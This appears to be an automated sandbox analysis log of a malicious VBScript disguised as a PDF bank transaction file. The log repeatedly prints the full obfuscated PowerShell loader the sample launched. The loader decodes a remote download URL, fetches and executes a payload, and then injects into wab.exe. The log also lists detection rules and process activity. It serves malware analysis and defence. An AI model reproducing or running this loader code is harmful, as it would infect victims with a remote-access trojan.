sk?PetiteC irpxA elspAudi,ofa,igr Su gt gmnd=bochedGr peoDelsaw FejlnAdvanl XerooAntema.nseddBevge& nonliTabordFlubd= iorh1O chf2F.ndeyTs.tsWJustehEmbryD elytklserePForte2 StueA C,nf-And,rDIrr,t0Reinv-,lmmeP BeloYMist Y CallqC,clo5FladtcHvinty YatafVe,ruhInf.ueCirkuo C.gn3Li,deEO,lfopDeut,S.olmuePr.je_Ph.ll9K.ukaKSankt ';$Ceratitidae=Hammondorglets 'B vog> Stag ';$Udglatter174=Hammondorglets 'cedryiChaloeMididx Rat, ';$Unshrinkingly='Ubiquities';$Superfluity = Hammondorglets 'KneeleDor.oc D,odhLand,o Vat. Opti%Rigwia BaadpDok,op.hrondDrupea tetrtPennya forj% Agna\Hjt aDDi,kke,nsigpCo rarIbrugaCantovTnd.aeOverosAmi r.Unc mTM,ndeeMisk,r svin Togvo& Pseu&Setba LnposeIonizcForedhTus.aoPol s MacrtAksem ';Markedsadgang (Hammondorglets 'Salts$ ForlgBeslalComidoTwee.bAfr,kaForurlMealy: In.assa,rou DorsbFiksatVix,nr A.vroIvi.dpSkumliVal.ts mmorkWyteseLamesskafka=Snide(Gldelc,ennemUnderdNdlgn Ta,t/Sa,myc Bug. Erys$UdspiSUnrepuAphrapConc.e Chamr Hebrftressl Bilyu IndkiH.mentBlgety ndri)Fundi ');Markedsadgang (Hammondorglets ' P.gt$ Re rgbudgelU vikoRenprb Co,uaMavedlM nil:.altecNyskal MdeaoHloftc BetokUdforwObfusiBru ssFemkaeAtlan=Ude.u$PsaltRRoastaGenskaSebi,sKysery St,alLitretGapcheKo,em.ReagesTyponp.rotol udraifatt.t ewil(fyrst$f,ldeC .ndee ngenrUndera,mmettGymnaitero,tM,aneiWrongd Shera oreteBrtte)Galop ');Markedsadgang (Hammondorglets 'Tilbe[ SchlNWeigheAc uitVeget.mun.cSst,leeDeta.rC,llbvBaga,iIm,osc Fonde SacrPCosm,oIntimiKritinHorn tForesMVagt aIncubnClinoa
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Hjkommisrs='Rakkerens';$Troublesome=${host}.Runspace;If ($Troublesome) {$Telephoning++;$Hjkommisrs+='Cacodorous';$Achyrodes='su';$Hjkommisrs+='Coruscate';$Achyrodes+='bs';$Hjkommisrs+='Tungusian';$Achyrodes+='tri';$Hjkommisrs+='Sonatinen';$Achyrodes+='ng';};Function Hammondorglets($Stavnen){$Vouchering=$Stavnen.Length-$Telephoning;For( $Svirrefluerne=5;$Svirrefluerne -lt $Vouchering;$Svirrefluerne+=6){$Ulceromembranous+=$Stavnen.$Achyrodes.'Invoke'( $Svirrefluerne, $Telephoning);}$Ulceromembranous;}function Markedsadgang($Diabolizing){ . ($Udglatter174) ($Diabolizing);}$Footslogging=Hammondorglets 'Di,boMI,trooKalorztausci ordtlHormelProseaB,gge/Feltr5 tim..Tegne0 Dm.n Baggr(GutwiWTmre iIul,snschrod He toEt.niwOb.igsCensu MedbyN InocTRdvin Derin1dorde0Tuber.Ersta0 Ch,f;P.arm NondiWHarstiUnsiznSpeed6Thorv4Tamil;M,gal Deco,xGeebu6heide4Misfo; Subs purtrProfivCrypt:Stork1 Evan2 Trep1Tilba.Fort 0Bogde)Piast BugtaGV skoe Skatc HandkMartyoSkavg/ Zai 2.lvia0Jazzh1Hukom0Ekspo0 B ni1Hasar0 Prie1Cacoe oldnFBis.aiKo sirSkareeFjolrf Uds oF,ugtxregio/ Doub1Cupre2 Okku1calip.indbj0Ve de ';$Uncoveredly=Hammondorglets 'DanneU manusRygerePuff.r ,lag-.riguA Sc pg T,umeTaramnProditMos k ';$Raasylte=Hammondorglets 'PsychhJomont G.smtImmovpChests Medd:Rub.i/Antia/ Obstd StjerSlanki Amylvf rmseAbbed..amesgWis,aoPorphoDk,drgSukatl Per eBorge. BrancFrekvoP.nkum Gimp/Progru UdvacKe sk?PetiteC irpxA elspAudi,ofa,igr Su gt gmnd=bochedGr peoDelsaw FejlnAdvanl XerooAntema.nseddBevge& nonliTabordFlubd= iorh1O chf2F.ndeyTs.tsWJustehEmbryD elytklserePForte2 StueA C,nf-And,rDIrr,t0Reinv-,lmmeP BeloYMist Y CallqC,clo5FladtcHvinty YatafVe,ruhInf.ueCirkuo C.gn3Li,deEO,lfopDeut,S.olmuePr.je_Ph.ll9K.ukaKSankt ';$Ceratitidae=Hammondorglets 'B vog> Stag ';$Udglatter174=Hammondorglets 'cedryiChaloeMididx Rat, ';$Unshrinkingly='Ubiquities';$Superfluity = Hammondorglets 'KneeleDor.oc D,odhLand,o Vat. Opti%Rigwia BaadpDok,op.hrondDrupea tetrtPennya forj% Agna\Hjt aDDi,kke,nsigpCo rarIbrugaCantovTnd.aeOverosAmi r.Unc mTM,ndeeMisk,r svin Togvo& Pseu&Setba LnposeIonizcForedhTus.aoPol s MacrtAksem ';Markedsadgang (Hammondorglets 'Salts$ ForlgBeslalComidoTwee.bAfr,kaForurlMealy: In.assa,rou DorsbFiksatVix,nr A.vroIvi.dpSkumliVal.ts mmorkWyteseLamesskafka=Snide(Gldelc,ennemUnderdNdlgn Ta,t/Sa,myc Bug. Erys$UdspiSUnrepuAphrapConc.e Chamr Hebrftressl Bilyu IndkiH.mentBlgety ndri)Fundi ');Markedsadgang (Hammondorglets ' P.gt$ Re rgbudgelU vikoRenprb Co,uaMavedlM nil:.altecNyskal MdeaoHloftc BetokUdforwObfusiBru ssFemkaeAtlan=Ude.u$PsaltRRoastaGenskaSebi,sKysery St,alLitretGapcheKo,em.ReagesTyponp.rotol udraifatt.t ewil(fyrst$f,ldeC .ndee ngenrUndera,mmettGymnaitero,tM,aneiWrongd Shera oreteBrtte)Galop ');Markedsadgang (Hammondorglets 'Tilbe[ SchlNWeigheAc uitVeget.mun.cSst,leeDeta.rC,llbvBaga,iIm,osc Fonde SacrPCosm,oIntimiKritinHorn tForesMVagt aIncubnClinoa			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFAACB3B161	2_2_00007FFAACB3B161
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFAACB3BF11	2_2_00007FFAACB3BF11
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_074DC8D8	12_2_074DC8D8

Source: pko_trans_details_20240909_105339#U00b7pdf.vbs

Initial sample: Strings found which are bigger than 50

Source: amsi32_3452.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5504, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 3452, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.troj.expl.evad.winVBS@14/9@2/2

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Depraves.Ter

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1408:120:WilError_03
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Mutant created: \Sessions\1\BaseNamedObjects\Rmc-U25QJ2

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mdwt1c4t.ovm.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\pko_trans_details_20240909_105339#U00b7pdf.vbs"

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5504
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=3452

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\pko_trans_details_20240909_105339#U00b7pdf.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Hjkommisrs='Rakkerens';$Troublesome=${host}.Runspace;If ($Troublesome) {$Telephoning++;$Hjkommisrs+='Cacodorous';$Achyrodes='su';$Hjkommisrs+='Coruscate';$Achyrodes+='bs';$Hjkommisrs+='Tungusian';$Achyrodes+='tri';$Hjkommisrs+='Sonatinen';$Achyrodes+='ng';};Function Hammondorglets($Stavnen){$Vouchering=$Stavnen.Length-$Telephoning;For( $Svirrefluerne=5;$Svirrefluerne -lt $Vouchering;$Svirrefluerne+=6){$Ulceromembranous+=$Stavnen.$Achyrodes.'Invoke'( $Svirrefluerne, $Telephoning);}$Ulceromembranous;}function Markedsadgang($Diabolizing){ . ($Udglatter174) ($Diabolizing);}$Footslogging=Hammondorglets 'Di,boMI,trooKalorztausci ordtlHormelProseaB,gge/Feltr5 tim..Tegne0 Dm.n Baggr(GutwiWTmre iIul,snschrod He toEt.niwOb.igsCensu MedbyN InocTRdvin Derin1dorde0Tuber.Ersta0 Ch,f;P.arm NondiWHarstiUnsiznSpeed6Thorv4Tamil;M,gal Deco,xGeebu6heide4Misfo; Subs purtrProfivCrypt:Stork1 Evan2 Trep1Tilba.Fort 0Bogde)Piast BugtaGV skoe Skatc HandkMartyoSkavg/ Zai 2.lvia0Jazzh1Hukom0Ekspo0 B ni1Hasar0 Prie1Cacoe oldnFBis.aiKo sirSkareeFjolrf Uds oF,ugtxregio/ Doub1Cupre2 Okku1calip.indbj0Ve de ';$Uncoveredly=Hammondorglets 'DanneU manusRygerePuff.r ,lag-.riguA Sc pg T,umeTaramnProditMos k ';$Raasylte=Hammondorglets 'PsychhJomont G.smtImmovpChests Medd:Rub.i/Antia/ Obstd StjerSlanki Amylvf rmseAbbed..amesgWis,aoPorphoDk,drgSukatl Per eBorge. BrancFrekvoP.nkum Gimp/Progru UdvacKe sk?PetiteC irpxA elspAudi,ofa,igr Su gt gmnd=bochedGr peoDelsaw FejlnAdvanl XerooAntema.nseddBevge& nonliTabordFlubd= iorh1O chf2F.ndeyTs.tsWJustehEmbryD elytklserePForte2 StueA C,nf-And,rDIrr,t0Reinv-,lmmeP BeloYMist Y CallqC,clo5FladtcHvinty YatafVe,ruhInf.ueCirkuo C.gn3Li,deEO,lfopDeut,S.olmuePr.je_Ph.ll9K.ukaKSankt ';$Ceratitidae=Hammondorglets 'B vog> Stag ';$Udglatter174=Hammondorglets 'cedryiChaloeMididx Rat, ';$Unshrinkingly='Ubiquities';$Superfluity = Hammondorglets 'KneeleDor.oc D,odhLand,o Vat. Opti%Rigwia BaadpDok,op.hrondDrupea tetrtPennya forj% Agna\Hjt aDDi,kke,nsigpCo rarIbrugaCantovTnd.aeOverosAmi r.Unc mTM,ndeeMisk,r svin Togvo& Pseu&Setba LnposeIonizcForedhTus.aoPol s MacrtAksem ';Markedsadgang (Hammondorglets 'Salts$ ForlgBeslalComidoTwee.bAfr,kaForurlMealy: In.assa,rou DorsbFiksatVix,nr A.vroIvi.dpSkumliVal.ts mmorkWyteseLamesskafka=Snide(Gldelc,ennemUnderdNdlgn Ta,t/Sa,myc Bug. Erys$UdspiSUnrepuAphrapConc.e Chamr Hebrftressl Bilyu IndkiH.mentBlgety ndri)Fundi ');Markedsadgang (Hammondorglets ' P.gt$ Re rgbudgelU vikoRenprb Co,uaMavedlM nil:.altecNyskal MdeaoHloftc BetokUdforwObfusiBru ssFemkaeAtlan=Ude.u$PsaltRRoastaGenskaSebi,sKysery St,alLitretGapcheKo,em.ReagesTyponp.rotol udraifatt.t ewil(fyrst$f,ldeC .ndee ngenrUndera,mmettGymnaitero,tM,aneiWrongd Shera oreteBrtte)Galop ');Markedsadgang (Hammondorglets 'Tilbe[ SchlNWeigheAc uitVeget.mun.cSst,leeDeta.rC,llbvBaga,iIm,osc Fonde SacrPCosm,oIntimiKritinHorn tForesMVagt aIncubnClinoa
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Depraves.Ter && echo t"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Hjkommisrs='Rakkerens';$Troublesome=${host}.Runspace;If ($Troublesome) {$Telephoning++;$Hjkommisrs+='Cacodorous';$Achyrodes='su';$Hjkommisrs+='Coruscate';$Achyrodes+='bs';$Hjkommisrs+='Tungusian';$Achyrodes+='tri';$Hjkommisrs+='Sonatinen';$Achyrodes+='ng';};Function Hammondorglets($Stavnen){$Vouchering=$Stavnen.Length-$Telephoning;For( $Svirrefluerne=5;$Svirrefluerne -lt $Vouchering;$Svirrefluerne+=6){$Ulceromembranous+=$Stavnen.$Achyrodes.'Invoke'( $Svirrefluerne, $Telephoning);}$Ulceromembranous;}function Markedsadgang($Diabolizing){ . ($Udglatter174) ($Diabolizing);}$Footslogging=Hammondorglets 'Di,boMI,trooKalorztausci ordtlHormelProseaB,gge/Feltr5 tim..Tegne0 Dm.n Baggr(GutwiWTmre iIul,snschrod He toEt.niwOb.igsCensu MedbyN InocTRdvin Derin1dorde0Tuber.Ersta0 Ch,f;P.arm NondiWHarstiUnsiznSpeed6Thorv4Tamil;M,gal Deco,xGeebu6heide4Misfo; Subs purtrProfivCrypt:Stork1 Evan2 Trep1Tilba.Fort 0Bogde)Piast BugtaGV skoe Skatc HandkMartyoSkavg/ Zai 2.lvia0Jazzh1Hukom0Ekspo0 B ni1Hasar0 Prie1Cacoe oldnFBis.aiKo sirSkareeFjolrf Uds oF,ugtxregio/ Doub1Cupre2 Okku1calip.indbj0Ve de ';$Uncoveredly=Hammondorglets 'DanneU manusRygerePuff.r ,lag-.riguA Sc pg T,umeTaramnProditMos k ';$Raasylte=Hammondorglets 'PsychhJomont G.smtImmovpChests Medd:Rub.i/Antia/ Obstd StjerSlanki Amylvf rmseAbbed..amesgWis,aoPorphoDk,drgSukatl Per eBorge. BrancFrekvoP.nkum Gimp/Progru UdvacKe sk?PetiteC irpxA elspAudi,ofa,igr Su gt gmnd=bochedGr peoDelsaw FejlnAdvanl XerooAntema.nseddBevge& nonliTabordFlubd= iorh1O chf2F.ndeyTs.tsWJustehEmbryD elytklserePForte2 StueA C,nf-And,rDIrr,t0Reinv-,lmmeP BeloYMist Y CallqC,clo5FladtcHvinty YatafVe,ruhInf.ueCirkuo C.gn3Li,deEO,lfopDeut,S.olmuePr.je_Ph.ll9K.ukaKSankt ';$Ceratitidae=Hammondorglets 'B vog> Stag ';$Udglatter174=Hammondorglets 'cedryiChaloeMididx Rat, ';$Unshrinkingly='Ubiquities';$Superfluity = Hammondorglets 'KneeleDor.oc D,odhLand,o Vat. Opti%Rigwia BaadpDok,op.hrondDrupea tetrtPennya forj% Agna\Hjt aDDi,kke,nsigpCo rarIbrugaCantovTnd.aeOverosAmi r.Unc mTM,ndeeMisk,r svin Togvo& Pseu&Setba LnposeIonizcForedhTus.aoPol s MacrtAksem ';Markedsadgang (Hammondorglets 'Salts$ ForlgBeslalComidoTwee.bAfr,kaForurlMealy: In.assa,rou DorsbFiksatVix,nr A.vroIvi.dpSkumliVal.ts mmorkWyteseLamesskafka=Snide(Gldelc,ennemUnderdNdlgn Ta,t/Sa,myc Bug. Erys$UdspiSUnrepuAphrapConc.e Chamr Hebrftressl Bilyu IndkiH.mentBlgety ndri)Fundi ');Markedsadgang (Hammondorglets ' P.gt$ Re rgbudgelU vikoRenprb Co,uaMavedlM nil:.altecNyskal MdeaoHloftc BetokUdforwObfusiBru ssFemkaeAtlan=Ude.u$PsaltRRoastaGenskaSebi,sKysery St,alLitretGapcheKo,em.ReagesTyponp.rotol udraifatt.t ewil(fyrst$f,ldeC .ndee ngenrUndera,mmettGymnaitero,tM,aneiWrongd Shera oreteBrtte)Galop ');Markedsadgang (Hammondorglets 'Tilbe[ SchlNWeigheAc uitVeget.mun.cSst,leeDeta.rC,llbvBaga,iIm,osc Fonde SacrPCosm,oIntimiKritinHorn tForesMVagt aIncubnClinoa
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Depraves.Ter && echo t"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: unknown	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Hjkommisrs='Rakkerens';$Troublesome=${host}.Runspace;If ($Troublesome) {$Telephoning++;$Hjkommisrs+='Cacodorous';$Achyrodes='su';$Hjkommisrs+='Coruscate';$Achyrodes+='bs';$Hjkommisrs+='Tungusian';$Achyrodes+='tri';$Hjkommisrs+='Sonatinen';$Achyrodes+='ng';};Function Hammondorglets($Stavnen){$Vouchering=$Stavnen.Length-$Telephoning;For( $Svirrefluerne=5;$Svirrefluerne -lt $Vouchering;$Svirrefluerne+=6){$Ulceromembranous+=$Stavnen.$Achyrodes.'Invoke'( $Svirrefluerne, $Telephoning);}$Ulceromembranous;}function Markedsadgang($Diabolizing){ . ($Udglatter174) ($Diabolizing);}$Footslogging=Hammondorglets 'Di,boMI,trooKalorztausci ordtlHormelProseaB,gge/Feltr5 tim..Tegne0 Dm.n Baggr(GutwiWTmre iIul,snschrod He toEt.niwOb.igsCensu MedbyN InocTRdvin Derin1dorde0Tuber.Ersta0 Ch,f;P.arm NondiWHarstiUnsiznSpeed6Thorv4Tamil;M,gal Deco,xGeebu6heide4Misfo; Subs purtrProfivCrypt:Stork1 Evan2 Trep1Tilba.Fort 0Bogde)Piast BugtaGV skoe Skatc HandkMartyoSkavg/ Zai 2.lvia0Jazzh1Hukom0Ekspo0 B ni1Hasar0 Prie1Cacoe oldnFBis.aiKo sirSkareeFjolrf Uds oF,ugtxregio/ Doub1Cupre2 Okku1calip.indbj0Ve de ';$Uncoveredly=Hammondorglets 'DanneU manusRygerePuff.r ,lag-.riguA Sc pg T,umeTaramnProditMos k ';$Raasylte=Hammondorglets 'PsychhJomont G.smtImmovpChests Medd:Rub.i/Antia/ Obstd StjerSlanki Amylvf rmseAbbed..amesgWis,aoPorphoDk,drgSukatl Per eBorge. BrancFrekvoP.nkum Gimp/Progru UdvacKe sk?PetiteC irpxA elspAudi,ofa,igr Su gt gmnd=bochedGr peoDelsaw FejlnAdvanl XerooAntema.nseddBevge& nonliTabordFlubd= iorh1O chf2F.ndeyTs.tsWJustehEmbryD elytklserePForte2 StueA C,nf-And,rDIrr,t0Reinv-,lmmeP BeloYMist Y CallqC,clo5FladtcHvinty YatafVe,ruhInf.ueCirkuo C.gn3Li,deEO,lfopDeut,S.olmuePr.je_Ph.ll9K.ukaKSankt ';$Ceratitidae=Hammondorglets 'B vog> Stag ';$Udglatter174=Hammondorglets 'cedryiChaloeMididx Rat, ';$Unshrinkingly='Ubiquities';$Superfluity = Hammondorglets 'KneeleDor.oc D,odhLand,o Vat. Opti%Rigwia BaadpDok,op.hrondDrupea tetrtPennya forj% Agna\Hjt aDDi,kke,nsigpCo rarIbrugaCantovTnd.aeOverosAmi r.Unc mTM,ndeeMisk,r svin Togvo& Pseu&Setba LnposeIonizcForedhTus.aoPol s MacrtAksem ';Markedsadgang (Hammondorglets 'Salts$ ForlgBeslalComidoTwee.bAfr,kaForurlMealy: In.assa,rou DorsbFiksatVix,nr A.vroIvi.dpSkumliVal.ts mmorkWyteseLamesskafka=Snide(Gldelc,ennemUnderdNdlgn Ta,t/Sa,myc Bug. Erys$UdspiSUnrepuAphrapConc.e Chamr Hebrftressl Bilyu IndkiH.mentBlgety ndri)Fundi ');Markedsadgang (Hammondorglets ' P.gt$ Re rgbudgelU vikoRenprb Co,uaMavedlM nil:.altecNyskal MdeaoHloftc BetokUdforwObfusiBru ssFemkaeAtlan=Ude.u$PsaltRRoastaGenskaSebi,sKysery St,alLitretGapcheKo,em.ReagesTyponp.rotol udraifatt.t ewil(fyrst$f,ldeC .ndee ngenrUndera,mmettGymnaitero,tM,aneiWrongd Shera oreteBrtte)Galop ');Markedsadgang (Hammondorglets 'Tilbe[ SchlNWeigheAc uitVeget.mun.cSst,leeDeta.rC,llbvBaga,iIm,osc Fonde SacrPCosm,oIntimiKritinHorn tForesMVagt aIncubnClinoa	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Depraves.Ter && echo t"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Hjkommisrs='Rakkerens';$Troublesome=${host}.Runspace;If ($Troublesome) {$Telephoning++;$Hjkommisrs+='Cacodorous';$Achyrodes='su';$Hjkommisrs+='Coruscate';$Achyrodes+='bs';$Hjkommisrs+='Tungusian';$Achyrodes+='tri';$Hjkommisrs+='Sonatinen';$Achyrodes+='ng';};Function Hammondorglets($Stavnen){$Vouchering=$Stavnen.Length-$Telephoning;For( $Svirrefluerne=5;$Svirrefluerne -lt $Vouchering;$Svirrefluerne+=6){$Ulceromembranous+=$Stavnen.$Achyrodes.'Invoke'( $Svirrefluerne, $Telephoning);}$Ulceromembranous;}function Markedsadgang($Diabolizing){ . ($Udglatter174) ($Diabolizing);}$Footslogging=Hammondorglets 'Di,boMI,trooKalorztausci ordtlHormelProseaB,gge/Feltr5 tim..Tegne0 Dm.n Baggr(GutwiWTmre iIul,snschrod He toEt.niwOb.igsCensu MedbyN InocTRdvin Derin1dorde0Tuber.Ersta0 Ch,f;P.arm NondiWHarstiUnsiznSpeed6Thorv4Tamil;M,gal Deco,xGeebu6heide4Misfo; Subs purtrProfivCrypt:Stork1 Evan2 Trep1Tilba.Fort 0Bogde)Piast BugtaGV skoe Skatc HandkMartyoSkavg/ Zai 2.lvia0Jazzh1Hukom0Ekspo0 B ni1Hasar0 Prie1Cacoe oldnFBis.aiKo sirSkareeFjolrf Uds oF,ugtxregio/ Doub1Cupre2 Okku1calip.indbj0Ve de ';$Uncoveredly=Hammondorglets 'DanneU manusRygerePuff.r ,lag-.riguA Sc pg T,umeTaramnProditMos k ';$Raasylte=Hammondorglets 'PsychhJomont G.smtImmovpChests Medd:Rub.i/Antia/ Obstd StjerSlanki Amylvf rmseAbbed..amesgWis,aoPorphoDk,drgSukatl Per eBorge. BrancFrekvoP.nkum Gimp/Progru UdvacKe sk?PetiteC irpxA elspAudi,ofa,igr Su gt gmnd=bochedGr peoDelsaw FejlnAdvanl XerooAntema.nseddBevge& nonliTabordFlubd= iorh1O chf2F.ndeyTs.tsWJustehEmbryD elytklserePForte2 StueA C,nf-And,rDIrr,t0Reinv-,lmmeP BeloYMist Y CallqC,clo5FladtcHvinty YatafVe,ruhInf.ueCirkuo C.gn3Li,deEO,lfopDeut,S.olmuePr.je_Ph.ll9K.ukaKSankt ';$Ceratitidae=Hammondorglets 'B vog> Stag ';$Udglatter174=Hammondorglets 'cedryiChaloeMididx Rat, ';$Unshrinkingly='Ubiquities';$Superfluity = Hammondorglets 'KneeleDor.oc D,odhLand,o Vat. Opti%Rigwia BaadpDok,op.hrondDrupea tetrtPennya forj% Agna\Hjt aDDi,kke,nsigpCo rarIbrugaCantovTnd.aeOverosAmi r.Unc mTM,ndeeMisk,r svin Togvo& Pseu&Setba LnposeIonizcForedhTus.aoPol s MacrtAksem ';Markedsadgang (Hammondorglets 'Salts$ ForlgBeslalComidoTwee.bAfr,kaForurlMealy: In.assa,rou DorsbFiksatVix,nr A.vroIvi.dpSkumliVal.ts mmorkWyteseLamesskafka=Snide(Gldelc,ennemUnderdNdlgn Ta,t/Sa,myc Bug. Erys$UdspiSUnrepuAphrapConc.e Chamr Hebrftressl Bilyu IndkiH.mentBlgety ndri)Fundi ');Markedsadgang (Hammondorglets ' P.gt$ Re rgbudgelU vikoRenprb Co,uaMavedlM nil:.altecNyskal MdeaoHloftc BetokUdforwObfusiBru ssFemkaeAtlan=Ude.u$PsaltRRoastaGenskaSebi,sKysery St,alLitretGapcheKo,em.ReagesTyponp.rotol udraifatt.t ewil(fyrst$f,ldeC .ndee ngenrUndera,mmettGymnaitero,tM,aneiWrongd Shera oreteBrtte)Galop ');Markedsadgang (Hammondorglets 'Tilbe[ SchlNWeigheAc uitVeget.mun.cSst,leeDeta.rC,llbvBaga,iIm,osc Fonde SacrPCosm,oIntimiKritinHorn tForesMVagt aIncubnClinoa	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Depraves.Ter && echo t"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptnet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cabinet.dll	Jump to behavior
